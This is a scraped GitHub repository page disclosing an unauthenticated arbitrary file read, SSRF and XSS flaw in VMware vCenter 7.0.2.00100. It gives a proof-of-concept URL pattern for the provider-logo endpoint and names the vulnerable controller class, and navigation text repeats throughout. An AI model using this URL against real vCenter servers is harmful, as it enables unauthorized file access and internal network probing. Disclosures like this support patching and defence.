VMware vCenter earlier versions (7.0.2.00100) has unauthorized arbitrary file read + ssrf + xss vulnerability

POC

https://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}

File read:

SSRF + XSS:

vulnerable code:

/etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jar

com.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()

Tested on vCenter 7.0.2.00100, not knowing the exact affected version range or cve id

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
README.md		README.md
code.PNG		code.PNG
file_read.PNG		file_read.PNG
xss.PNG		xss.PNG

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

code.PNG

code.PNG

file_read.PNG

file_read.PNG

xss.PNG

xss.PNG

Repository files navigation

VMware vCenter earlier versions (7.0.2.00100) has unauthorized arbitrary file read + ssrf + xss vulnerability

POC

vulnerable code:

About

Releases

Packages

l0ggg/VMware_vCenter

Folders and files

Latest commit

History

Repository files navigation

VMware vCenter earlier versions (7.0.2.00100) has unauthorized arbitrary file read + ssrf + xss vulnerability

POC

vulnerable code:

About

Resources

Stars

Watchers

Forks